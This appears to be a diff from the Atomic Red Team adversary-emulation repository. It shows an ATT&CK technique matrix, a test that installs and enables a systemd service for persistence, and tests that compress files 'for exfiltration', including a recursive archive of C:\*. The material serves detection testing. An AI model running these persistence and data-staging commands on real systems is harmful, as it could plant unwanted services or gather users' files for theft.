| | | PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | | | | | |
| | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | [Rogue Domain Controller](../../T1207/T1207.md) | | | | | | | |
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution](../../T1546/T1546.md) | File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
| | | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Authentication Package](../../T1547.002/T1547.002.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | | | | | | | |
| | | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | | | | | | | |
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | | | | | | | |
| | | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md) | | | | | | | |
| | | Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | | | | | | | |
| | | Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | [Signed Binary Proxy Execution: Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | |
| | | [Account Manipulation](../../T1098/T1098.md) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [IIS Components](../../T1505.004/T1505.004.md) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution](../../T1546/T1546.md) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
| | | [Authentication Package](../../T1547.002/T1547.002.md) | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
| | | Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | | | | | | | |
| | | [Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md) | | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | [Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [BITS Jobs](../../T1197/T1197.md) | | Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | | [Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | | | | | | | |
| | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
| | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Impair Defenses: HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
| | | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | | Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Office Application Startup: Office Test](../../T1137.002/T1137.002.md) | | Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | | Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | | [Signed Binary Proxy Execution: Compiled HTML File](../../T1218.001/T1218.001.md) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Indicator Removal on Host: Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
| | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | [Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) | | | | | | | |
| | | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
| | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Run Virtual Instance](../../T1564.006/T1564.006.md) | | | | | | | |
| | | | | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | | | | | | | |
| | | | | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Signed Binary Proxy Execution: Regsvr32](../../T1218.010/T1218.010.md) | | | | | | | |
| | | | | [Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md) | | | | | | | |
| | | | | Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
| | | | | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Signed Binary Proxy Execution: Regsvcs/Regasm](../../T1218.009/T1218.009.md) | | | | | | | |
| | | | | [Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
| | | | | [Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md) | | | | | | | |
| | | | | VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [BITS Jobs](../../T1197/T1197.md) | | | | | | | |
| | | | | [Trusted Developer Utilities Proxy Execution: MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
| | | | | Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Hide Artifacts: Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | |
| | | | | Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [HTML Smuggling](../../T1027.006/T1027.006.md) | | | | | | | |
| | | | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) | | | | | | | |
| | | | | Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Template Injection](../../T1221/T1221.md) | | | | | | | |
| | | | | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Obfuscated Files or Information: Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | |
| | | | | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | | | | | | | |
| | | | | Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Dynamic API Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [XSL Script Processing](../../T1220/T1220.md) | | | | | | | |
| | | | | [Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | |
| | | | | Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Hide Artifacts: NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | |
| | | | | NTFS File Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | | | | | | | |
| | | | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Signed Script Proxy Execution](../../T1216/T1216.md) | | | | | | | |
| | | | | InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | |
| | | | | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md) | | | | | | | |
| | | | | MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Process Argument Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | | | | | | | |
atomics/Indexes/azure-ad-index.yaml
-69146
View File
File diff suppressed because it is too large Load Diff
atomics/Indexes/containers-index.yaml
-68845
View File
File diff suppressed because it is too large Load Diff
atomics/Indexes/google-workspace-index.yaml
-68331
View File
File diff suppressed because it is too large Load Diff
atomics/Indexes/iaas-index.yaml
-68123
View File
File diff suppressed because it is too large Load Diff
atomics/Indexes/iaas_aws-index.yaml
-68460
View File
File diff suppressed because it is too large Load Diff
atomics/Indexes/iaas_azure-index.yaml
-68944
View File
File diff suppressed because it is too large Load Diff
atomics/Indexes/iaas_gcp-index.yaml
-68331
View File
File diff suppressed because it is too large Load Diff
atomics/Indexes/index.yaml
-114094
View File
File diff suppressed because it is too large Load Diff
atomics/Indexes/linux-index.yaml
-77504
View File
File diff suppressed because it is too large Load Diff
atomics/Indexes/macos-index.yaml
-74372
View File
File diff suppressed because it is too large Load Diff
atomics/Indexes/office-365-index.yaml
-68301
View File
File diff suppressed because it is too large Load Diff
atomics/Indexes/saas-index.yaml
-68123
View File
File diff suppressed because it is too large Load Diff
atomics/Indexes/windows-index.yaml
-98696
View File
File diff suppressed because it is too large Load Diff
atomics/RC13378/RC13378.yaml
+73
View File
@@ -0,0 +1,73 @@
---
attack_technique: RC13378
display_name: Systemd Service Creation
atomic_tests:
- name: Create Systemd Service
description: |
This test creates a Systemd service unit file and enables it as a service.
supported_platforms:
- linux
input_arguments:
execstart_action:
description: ExecStart action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execstart-marker
execstartpre_action:
description: ExecStartPre action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execstartpre-marker
execstartpost_action:
description: ExecStartPost action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execstartpost-marker
execreload_action:
description: ExecReload action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execreload-marker
execstop_action:
description: ExecStop action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execstop-marker
execstoppost_action:
description: ExecStopPost action for Systemd service
type: String
default: /bin/touch /tmp/art-systemd-execstoppost-marker
executor:
name: bash
command: |
echo "[Unit]" > /etc/systemd/system/art-systemd-service.service
echo "Description=Atomic Red Team Systemd Service" >> /etc/systemd/system/art-systemd-service.service
echo "" >> /etc/systemd/system/art-systemd-service.service
echo "[Service]" >> /etc/systemd/system/art-systemd-service.service
echo "Type=simple"
echo "ExecStart=#{execstart_action}" >> /etc/systemd/system/art-systemd-service.service
echo "ExecStartPre=#{execstartpre_action}" >> /etc/systemd/system/art-systemd-service.service
echo "ExecStartPost=#{execstartpost_action}" >> /etc/systemd/system/art-systemd-service.service
echo "ExecReload=#{execreload_action}" >> /etc/systemd/system/art-systemd-service.service
echo "ExecStop=#{execstop_action}" >> /etc/systemd/system/art-systemd-service.service
echo "ExecStopPost=#{execstoppost_action}" >> /etc/systemd/system/art-systemd-service.service
echo "" >> /etc/systemd/system/art-systemd-service.service
echo "[Install]" >> /etc/systemd/system/art-systemd-service.service
echo "WantedBy=default.target" >> /etc/systemd/system/art-systemd-service.service
systemctl daemon-reload
systemctl enable art-systemd-service.service
systemctl start art-systemd-service.service
- name: Cleanup Systemd Test
description: |
This cleans up the remnants of the SystemD service unit file creation test.
supported_platforms:
- linux
executor:
name: bash
command: |
systemctl stop art-systemd-service.service
systemctl disable art-systemd-service.service
rm -rf /etc/systemd/system/art-systemd-service.service
systemctl daemon-reload
atomics/T1002/T1002.md
+111
View File
@@ -0,0 +1,111 @@
# T1002 - Data Compressed
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1002)
<blockquote>An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Compress Data for Exfiltration With PowerShell](#atomic-test-1---compress-data-for-exfiltration-with-powershell)
- [Atomic Test #2 - Compress Data for Exfiltration With Rar](#atomic-test-2---compress-data-for-exfiltration-with-rar)
- [Atomic Test #3 - Data Compressed - nix - zip](#atomic-test-3---data-compressed---nix---zip)
- [Atomic Test #4 - Data Compressed - nix - gzip Single File](#atomic-test-4---data-compressed---nix---gzip-single-file)
- [Atomic Test #5 - Data Compressed - nix - tar Folder or File](#atomic-test-5---data-compressed---nix---tar-folder-or-file)
<br/>
## Atomic Test #1 - Compress Data for Exfiltration With PowerShell
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path that should be compressed into our output file | Path | C:\*|
| output_file | Path where resulting compressed data should be placed | Path | C:\test\Data.zip|
#### Run it with `powershell`!
```
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
```
<br/>
<br/>
## Atomic Test #2 - Compress Data for Exfiltration With Rar
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path that should be compressed into our output file | Path | *.docx|
| output_file | Path where resulting compressed data should be placed | Path | exfilthis.rar|
#### Run it with `command_prompt`!
```
rar a -r #{output_file} #{input_file}
```
<br/>
<br/>
## Atomic Test #3 - Data Compressed - nix - zip
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression.
**Supported Platforms:** Linux, macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_files | Path that should be compressed into our output file, may include wildcards | Path | /tmp/victim-files/*|
| output_file | Path that should be output as a zip archive | Path | /tmp/victim-files.zip|
#### Run it with `sh`!
```
zip #{output_file} #{input_files}
```
<br/>
<br/>
## Atomic Test #4 - Data Compressed - nix - gzip Single File
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
**Supported Platforms:** Linux, macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path that should be compressed | Path | /tmp/victim-gzip.txt|
#### Run it with `sh`!
```
gzip -f #{input_file}
```
<br/>
<br/>
## Atomic Test #5 - Data Compressed - nix - tar Folder or File
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
**Supported Platforms:** Linux, macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file_folder | Path that should be compressed | Path | /tmp/victim-files/|
| output_file | File that should be output | Path | /tmp/victim-files.tar.gz|
#### Run it with `sh`!
```
tar -cvzf #{output_file} #{input_file_folder}
```
<br/>
atomics/T1002/T1002.yaml
+98
View File
@@ -0,0 +1,98 @@
---
attack_technique: T1002
display_name: Data Compressed
atomic_tests:
- name: Compress Data for Exfiltration With PowerShell
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
supported_platforms:
- windows
input_arguments:
input_file:
description: Path that should be compressed into our output file
type: Path
default: C:\*
output_file:
description: Path where resulting compressed data should be placed
type: Path
default: C:\test\Data.zip
executor:
name: powershell
command: |
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
- name: Compress Data for Exfiltration With Rar
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
supported_platforms:
